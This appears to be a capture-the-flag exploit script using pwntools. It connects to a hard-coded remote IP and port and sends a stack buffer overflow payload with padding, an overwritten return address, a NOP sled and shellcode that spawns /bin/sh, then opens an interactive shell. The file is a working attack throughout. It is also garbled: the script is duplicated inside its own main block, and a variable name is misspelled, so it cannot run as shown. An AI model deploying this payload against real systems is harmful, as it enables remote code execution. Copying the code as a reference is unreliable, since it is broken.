crixpwn/earth.py

## earth.py
from pwn import *
from hexdump import *

r = remote("223.194.105.182", 22900)

def main():
	shellcode = ("\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9" +
             "\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35" +
             "\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15" +
             "\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d" +
             "\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56" +
             "\x67\xe1\xac\xb6\x4a\x85")

	payload = "A" * 0x6c
	payload += "BBBB"
	payload += p32(0xbfffec3c + 200)
	payload += "\x90" * 2000
	payload += shellcod
	payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

	r.sendline(payload)

	r.interactive()
if __name__=='__main__':
	main()
	from pwn import *
	from hexdump import *

	r = remote("223.194.105.182", 22900)

	def main():
	shellcode = ("\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9" +
	"\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35" +
	"\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15" +
	"\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d" +
	"\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56" +
	"\x67\xe1\xac\xb6\x4a\x85")

	payload = "A" * 0x6c
	payload += "BBBB"
	payload += p32(0xbfffec3c + 200)
	payload += "\x90" * 2000
	payload += shellcod
	payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

	r.sendline(payload)

	r.interactive()
	if __name__=='__main__':
	main()